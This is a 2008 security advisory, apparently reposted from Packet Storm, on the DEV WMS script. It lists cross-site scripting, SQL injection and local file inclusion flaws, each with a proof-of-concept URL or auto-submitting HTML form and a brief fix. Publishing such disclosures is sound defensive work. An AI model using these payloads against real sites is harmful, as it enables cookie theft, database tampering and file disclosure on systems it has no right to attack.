devwms-lfisqlxss.txt

2008-07-31T00:00:00
ID PACKETSTORM:68648
Type packetstorm
Reporter IRCRASH
Modified 2008-07-31T00:00:00

Description

                                        
                                            `----------------------------------------------------------------  
  
Script : DEV WMS  
  
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection )  
  
Alert : High  
  
----------------------------------------------------------------  
  
Discovered by : Khashayar Fereidani Or Dr.Crash  
  
My Website : HTTP://FEREIDANI.IR  
  
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com  
  
----------------------------------------------------------------  
  
Script Download : http://dev-wms.sourceforge.net/  
  
----------------------------------------------------------------  
  
XSS Vulnerability 1 :  
  
Variable Sent Method : GET  
  
Vulnerable Variable : session  
  
Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script>  
  
Solution : filter session variable with htmlspecialchars() function ...  
  
----------------------------------------------------------------  
  
Xss Vulnerability 2 :   
  
Variable Sent Method : POST  
  
Vulnerable Variable : kluc  
  
Address : http://Example.com/index.php?session=0&action=search  
  
change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie .  
  
<html>  
<head></head>  
<body onLoad=javascript:document.form.submit()>  
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">  
<form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/>  
<input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>">  
</form>  
</body>  
</html>  
  
Solution : filter kluc variable with htmlspecialchars() function ...  
  
----------------------------------------------------------------  
SQL Injection :  
  
Method Of Send : GET  
  
Vulnerable Variable : article  
  
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]  
  
Solution : Filter danger caracter for article variable ...  
  
----------------------------------------------------------------  
Local file inclusion :  
  
Method Of Send : GET  
  
Vulnerable Variable : step  
  
Address : http://Example.com/admin/index.php?start=install&step=file.type%00  
  
Solution : Filter step variable with if function ...  
  
----------------------------------------------------------------  
  
Tnx : God  
  
HTTP://IRCRASH.COM  
  
----------------------------------------------------------------  
`